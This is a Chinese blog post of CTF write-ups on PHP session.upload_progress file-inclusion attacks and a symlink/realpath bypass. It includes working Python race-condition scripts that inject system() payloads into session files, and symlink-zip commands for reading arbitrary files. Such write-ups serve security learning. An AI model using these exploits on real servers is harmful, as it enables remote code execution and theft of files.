session.upload_progress文件包含

已于 2023-05-12 13:43:49 修改
阅读量910 收藏 4
点赞数 2
文章标签: php web安全
于 2022-05-29 22:49:05 首次发布
Aiwin
本文链接:https://blog.csdn.net/weixin_53090346/article/details/125037416
版权

目录

一、[第五空间 2021]EasyCleanup

二、[HNCTF 2022 WEEK3]QAQ_1inclu4e

一、[第五空间 2021]EasyCleanup

进入题目:源代码

<?php 
if(!isset($_GET['mode'])){ 
    highlight_file(__file__); 
}else if($_GET['mode'] == "eval"){ 
    $shell = isset($_GET['shell']) ? $_GET['shell'] : 'phpinfo();'; 
    if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker"); 
    eval($shell); 
} 


if(isset($_GET['file'])){ 
    if(strlen($_GET['file']) > 15 | filter($_GET['file'])) exit("hacker"); 
    include $_GET['file']; 
} 


function filter($var){ 
    $banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*", "`"]; 

    foreach($banned as $ban){ 
        if(strstr($var, $ban)) return True; 
    } 

    return False; 
} 

function checkNums($var){ 
    $alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'; 
    $cnt = 0; 
    for($i = 0; $i < strlen($alphanum); $i++){ 
        for($j = 0; $j < strlen($var); $j++){ 
            if($var[$j] == $alphanum[$i]){ 
                $cnt += 1; 
                if($cnt > 8) return True; 
            } 
        } 
    } 
    return False; 
} 
?>

源代码中可以进行参数shell的文件执行,会参数file的文件包含,但是限制了字符,并且对a-z0-9A-Z进行了匹配,存在就exit(),要绕过这些匹配进行shell的rce执行,自己好像没有什么办法,先看看phpinfo()的内容。

关键点在于:

1,session.save_handler	files	files
2,session.save_path	/tmp	/tmp
3,session.serialize_handler	php	php
4,session.upload_progress.cleanup	On	On
5,session.upload_progress.enabled	On	On
6,session.upload_progress.freq	1%	1%
7,session.upload_progress.min_freq	1	1
8,session.upload_progress.name	PHP_SESSION_UPLOAD_PROGRESS	PHP_SESSION_UPLOAD_PROGRESS
9,session.upload_progress.prefix	upload_progress_	upload_progress_
10,session.use_cookies	On	On
11,session.use_only_cookies	On	On
12,session.use_strict_mode	Off	Off

第一行表示session以文件的形式存储。

第二行表示session存储目录在/tmp下。

第三行表示反序列化和序列号的处理器是PHP。

第五行表示upload_progress功能启动,即浏览器向服务器上传文件时,php会把此次文件上传的详细信息存储在session中。

第四行表示文件上传结束后,php会立即清除对应session文件中的内容。

第六七行中的freq 和 min_freq 两项用来设置服务器端对进度信息的更新频率。合理的设置这两项可以减轻服务器的负担。

第八九行中的prefix 和 name 两项用来设置进度信息在session中存储的变量名/键名。

第十行表示使用cookie记录sessionid。

第十一行表示是否在客户端仅仅使用 cookie 来存放会话 ID。

第十二行中的值为off,表示Cookie中的sessionid可控。

解题思路:

当我们自己定义Cookie中的PAPSESSID时,PHP为在服务器创建文件并存储在tmp/sess_id。服务器会自动初始化Session,由(prefix+session.upload_progress.name)组成,由于十二行为off,可以自定义cookie存储session文件,然后控制文件的内容,进行file的文件包含,因为cleanup是开启的,所以需要使用条件竞争,在php为清除掉时,就访问临时tmp/sess_id文件包含进去。

一般Session的存放目录有:

/tmp/sess_PHPSESSID
/var/lib/php/sess_PHPSESSID
/var/lib/php/sessions/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID

即传输这样的内容:

 脚本:

import requests
import threading

myurl = 'http://1.14.71.254:28736/index.php'
sessid = '1a1'
writedata = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('cat /nssctfasdasdflag');?>"}
mycookie = {'PHPSESSID': sessid}
proxies = {
    "http": "127.0.0.1:8080",
}


def send_file(session):
    while True:
        resp = requests.post(url=myurl, data=writedata, files={'file': ('1.txt', 123)}, cookies=mycookie)

def getflag(session):
    while True:
        payload_url = myurl + '?file=' + '/tmp/sess_' +sessid
        resp = requests.get(url=payload_url)
        if 'upload_progress' in resp.text:
            print(resp.text)
            break


if __name__ == '__main__':
    session = requests.session()
    t = threading.Thread(target=send_file, args=(session,))
    t.start()
    getflag(session)

得到结果

二、[HNCTF 2022 WEEK3]QAQ_1inclu4e

1、进入题目

只给了传base64的提示,提示flag在神秘的地方。 这里看了别人的WP才知道,也是session的文件包含,直接上一样的脚本即可得到flag。

import requests
import threading

myurl = 'http://43.143.7.97:28307/'
sessid = '1a1'
writedata = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('cat /var/ffflllaaagggflag');?>"}
mycookie = {'PHPSESSID': sessid}
proxies = {
    "http": "127.0.0.1:8080",
}


def send_file(session):
    while True:
        resp = requests.post(url=myurl, data=writedata, files={'file': ('1.txt', 123)}, cookies=mycookie)

def getflag(session):
    while True:
        payload_url = myurl + '?QAQ=' + '/tmp/sess_' +sessid
        resp = requests.get(url=payload_url)
        if 'upload_progress' in resp.text:
            print(resp.text)
            break


if __name__ == '__main__':
    session = requests.session()
    t = threading.Thread(target=send_file, args=(session,))
    t.start()
    getflag(session)

[HXPCTF 2021]unzipper

<?php
session_start() or die('session_start');

$_SESSION['sandbox'] ??= bin2hex(random_bytes(16));
$sandbox = 'data/' . $_SESSION['sandbox'];
$lock = fopen($sandbox . '.lock', 'w') or die('fopen');
flock($lock, LOCK_EX | LOCK_NB) or die('flock');

@mkdir($sandbox, 0700);
chdir($sandbox) or die('chdir');

if (isset($_FILES['file']))
    system('ulimit -v 8192 && /usr/bin/timeout -s KILL 2 /usr/bin/unzip -nqqd . ' . escapeshellarg($_FILES['file']['tmp_name']));
else if (isset($_GET['file']))
    if (0 === preg_match('/(^$|flag)/i', realpath($_GET['file']) ?: ''))
        readfile($_GET['file']);

fclose($lock);

很像是session文件包含,但是其实不是,这是一道软连接的题目,挺新奇的,于是记录一下

简单分析下代码: 可以通过post传入file文件,文件会被unzip解压到随机16字节的data/目录中,然后提供了readfile方法读取文件,但是不能出现flag,否则会被realpath替代掉。realpath会解析软链接的路径,返回一个绝对路径。

整个解题思路就是readfile在接收url路径的参数时,比如file:///flag.txt会去读取/flag.txt文件,而realpath会视作file:文件夹下的flag.txt文件,如果我们制作一个指向file:文件夹的aaa任意文件,它在 realpath 时被扩展为..../file:/aaa可以通过 if 比较,而在 readfile 中则会按照 url 的方式进行解析,读取根目录下的 flag.txt。

mkdir file:
cd file:
touch amiz.txt
ln -s amiz.txt flag.txt
cd ..
zip -ry tttttemp.zip file:

import requests

headers = {
    'Cookie': 'PHPSESSID=eppr850012o74krcqb5o9kunsq'
}

url = 'http://node4.anna.nssctf.cn:28442/'


def upload():
    resp = requests.post(url, files={'file': open(file='A:\下载\\tmp.zip', mode='rb')}, headers=headers)
    print(resp.text)


def read():
    params = {
        'file': "file:///flag.txt"
    }
    resp = requests.get(url, params=params, headers=headers)
    print(resp.text)


upload()
read()

M03-Aiwin
关注
利用PHP_SESSION_UPLOAD_PROGRESS上传webshell
god_Zeo的安全博客
09-24 857
0x01 环境配置&利用条件 环境分析 session.use_strict_mode默认值为0,此时用户是可以自己定义Session ID的 我们在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag session.upload_progress.prefix由我们构造的session.upload_progress.name值组成,最后被写入sess_文件里。 所以: 这个文件名是PHPSESSID=flag,文件名
-------已搬运------session.upload_progress。伪造session 反序列化 + 文件包含,,临时文件包含 ++ PHP7 的 segment fault
Zero_Adam的博客
05-01 751
目录:1. 在session反序列化,PHP解析器的考点中使用。2. 进行文件包含:!!!我发现了一个新的方法: 1. 在session反序列化,PHP解析器的考点中使用。 PHP反序列化之SEESSION反序列化(二):切入学习点:jarvis OJ PHPINFO. 这个是利用了当session.upload_progress.enabled开启时如果我们上传了一个和session.upload_progress.name同名的变量,也就是名字为PHP_SESSION_UPLOAD_PROGRESS的时
PHP基于session.upload_progress 实现文件上传进度显示功能详解
10-16
主要介绍了PHP基于session.upload_progress 实现文件上传进度显示功能,结合实例形式分析了php5.4版本session.upload_progress特性实现文件上传进度显示的相关操作技巧,需要的朋友可以参考下
自娱自乐:BUUCTF解题思路之Basic
最新发布
weixin_43520214的博客
09-23 1151
BUUCTF一些基础篇的解题思路
利用session.upload_progress进行文件包含
qq_44657899的博客
10-26 4354
前言 又一种新的文件包含利用方法,记录一下复现过程。 学习自:LFI 绕过 Session 包含限制 Getshell 利用session.upload_progress进行文件包含和反序列化渗透 文章目录前言kali本地测试利用burp利用python脚本 kali本地测试 所有配置都为默认配置 大概原理:利用session.upload_progress上传一个临时文件,该文件里面有我们上传的恶意代码,然后包含它,从而执行里面的代码。因为该文件内容清空很快,所以需要不停的上传和包含,在清空之前包含该
session.upload_progress进行文件包含和反序列化学习
snowlyzz的博客
09-07 505
利用session.upload_progress进行文件包含
PHP Session和Javascript实现文件上传进度条
huank_dmy的博客
07-13 568
PHP Session和Javascript实现文件上传进度条Web应用中常需要提供文件上传的功能。典型的场景包括用户头像上传、相册图片上传等。当需要上传的文件比较大的时候,提供一个显示上传进度的进度条就很有必要了。在PHP 5.4以前,实现这样的进度条并不容易,主要有三种方法: 1、使用Flash, Java, ActiveX 2、使用PHP的APC扩展 3、使用HTML5的File AP
文件包含骚姿势——利用session.upload_progress进行文件包含
weixin_46330722的博客
12-25 2086
利用session.upload_progress进行文件包含
对于session.upload_progress漏洞的理解
Huamang的博客
03-06 1026
先放两个文章: https://www.freebuf.com/vuls/202819.html https://www.cnblogs.com/NPFS/p/13795170.html 利用session.upload_progress进行文件包含: 信息介绍: session.use_strict_mode默认值为0,此时用户是可以自己定义Session ID的。 比如,我们在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag(还有可能在 /v
利用session.upload_progress执行文件包含
m0_70638961的博客
08-27 912
默认情况下,session.upload_progress是开启的,我们发送一下以下数据包,可见,我在上传文件的同时,POST了一个名为PHP_SESSION_UPLOAD_PROGRESS的字段,其值为。session.upload_progress最初是PHP为上传进度条设计的一个功能,在上传文件较大的情况下,PHP将进行流式上传,并将进度信息放在Session中(包含用户可控的值),即使此时用户没有初始化SessionPHP也会自动初始化Session。按理来说这个脚本是没什么问题的。
php通过session实现upload_progress
prape's world!
01-07 1178
php中,显示上传文件进度有swf,apc,纯javascript等集中方法,而现在比较推荐的是利用phpsessionPHP>5.4)实现,这里,我简单的记录一下。 相关资料可以参考php.net/manual/en/session.upload-progress.php,还是相对比较简单的,可以参考www.111cn.net/phper/php-cy/54314.htm这里的讲解,但是
深入浅出带你学习利用session.upload_progress进行文件包含/深入浅出带你学习利用session.upload_progress进行文件包含_新手渗透自学
程序员六七的博客
05-17 361
本文正在参加「金石计划 . 瓜分6万现金大奖」前言该思路是很久之前在CTF比赛中学习到的,可以简单理解为利用.来进行文件竞争从而达到上传文件进行文件包含或者命令执行的目的
session.upload_progress反序列化学习
..
03-10 1885
Session的配置选项和存储方式 在php.ini中存在四项配置项: session.save_path="" --设置session的存储路径 session.save_handler="" --设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式) session.auto_start boolen --指定会话模块是否在请求开始时启动一个会话,默认为0不启动 session.serialize_handler string --定义用来...
[NPUCTF2020]ezinclude php segment fault特性 PHP_SESSION_UPLOAD_PROGRESS文件包含
scrawman的博客
11-25 469
[NPUCTF2020]ezinclude 如果什么都没传会返回这个Hash值,猜测是name为空时pass的值 整挺好,跳出来了flflflflag.php 因为直接访问会跳到404页面所以还是得抓包 先用filter伪协议读取源文件:/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=index.php 返回的是base64编码过的,解码过后得到源码: <html> <head> <
php7 uploadprogress,PHP基于session.upload_progress 实现文件上传进度显示功能详解
weixin_30209891的博客
03-12 325
本文实例讲述了PHP基于session.upload_progress 实现文件上传进度显示功能。分享给大家供大家参考,具体如下:介绍session.upload_progressPHP5.4的新特征。当 session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助,但在文件上传时应用可以...
php-session文件包含和反序列化(对session.upload_progress的利用)
unexpectedthing的博客
02-11 1731
文章目录前言session的简介PHPsession的存储方式php.ini中的一些配置php中的session.upload_progress文件包含反序列化$_SESSION变量直接可控$_SESSION变量不可控参考链接 前言 本文是利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含和反序列化的总结。 也就是关于php-session文件包含和反序列化 session的简介 session被称为“会话控制”,Session 对象存储特定用户会话所需的属性及配置信息。这样,当用
session.upload_progress文件包含漏洞
leekos的博客,分享web安全相关知识~
06-02 692
之前学习了该漏洞,但是没有做笔记,导致容易遗忘。在此用一个题目来理解漏洞以下是session.upload_progress.enabled可以控制是否开启session.upload_progress功能session.upload_progress.cleanup可以控制是否在上传之后删除文件内容session.upload_progress.prefix可以设置上传文件内容中的前缀session.upload_progress.name的值即为session中的键值。
PHP5.4及以上版本利用Session实现文件上传进度条
例如,设置`session.upload_progress.enabled = On`开启上传进度支持,`session.upload_progress.prefix`用于设置session名称前缀,确保与预期的进度条关联。 在客户端,你可以通过以下步骤实现: 1. 前端交互: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M03-Aiwin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值